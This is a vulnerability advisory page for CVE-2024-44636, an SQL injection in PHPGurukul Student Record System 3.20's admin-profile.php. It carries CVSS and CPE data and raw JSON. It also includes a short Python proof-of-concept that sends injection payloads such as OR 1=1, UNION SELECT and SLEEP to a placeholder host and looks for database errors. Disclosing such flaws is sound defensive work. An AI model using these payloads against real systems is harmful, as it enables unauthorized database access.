Security Vulnerability Report
中文
CVE-2024-44636 CVSS 6.5 MEDIUM

CVE-2024-44636

Published: 2025-11-14 16:15:48
Last Modified: 2025-11-17 18:22:01

Description

PHPGurukul Student Record System 3.20 is vulnerable to SQL Injection via the adminname and aemailid parameters in /admin-profile.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:student_record_system:3.20:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Student Record System 3.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2024-44636 SQL Injection PoC # Target: PHPGurukul Student Record System 3.20 # Endpoint: /admin-profile.php # Vulnerable Parameter: adminname, aemailid target_url = "http://target.com/admin-profile.php" # SQL Injection payloads payloads = [ "admin' OR '1'='1", "admin' UNION SELECT NULL--", "admin' AND SLEEP(5)--", "' OR 1=1 LIMIT 1--" ] def test_sql_injection(): print("Testing CVE-2024-44636 SQL Injection...") for payload in payloads: # Test adminname parameter params = { 'adminname': payload, 'aemailid': '[email protected]' } try: response = requests.get(target_url, params=params, timeout=10) # Check for SQL error indicators sql_errors = [ 'MySQL', 'SQL syntax', 'mysql_fetch', 'Warning', 'mysql_num_rows', 'SQLite', 'PostgreSQL', 'ORA-', 'Microsoft SQL' ] for error in sql_errors: if error in response.text: print(f"[+] Vulnerable! Payload: {payload}") print(f"[+] Error detected: {error}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": test_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44636", "sourceIdentifier": "[email protected]", "published": "2025-11-14T16:15:48.100", "lastModified": "2025-11-17T18:22:00.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Student Record System 3.20 is vulnerable to SQL Injection via the adminname and aemailid parameters in /admin-profile.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:student_record_system:3.20:*:*:*:*:*:*:*", "matchCriteriaId": "3BE56291-1C2E-4DFB-84CB-1C130EBA0DE2"}]}]}], "references": [{"url": "https://phpgurukul.com/student-record-system-php", "source": "[email protected]", "tags": ["Product"]}]}}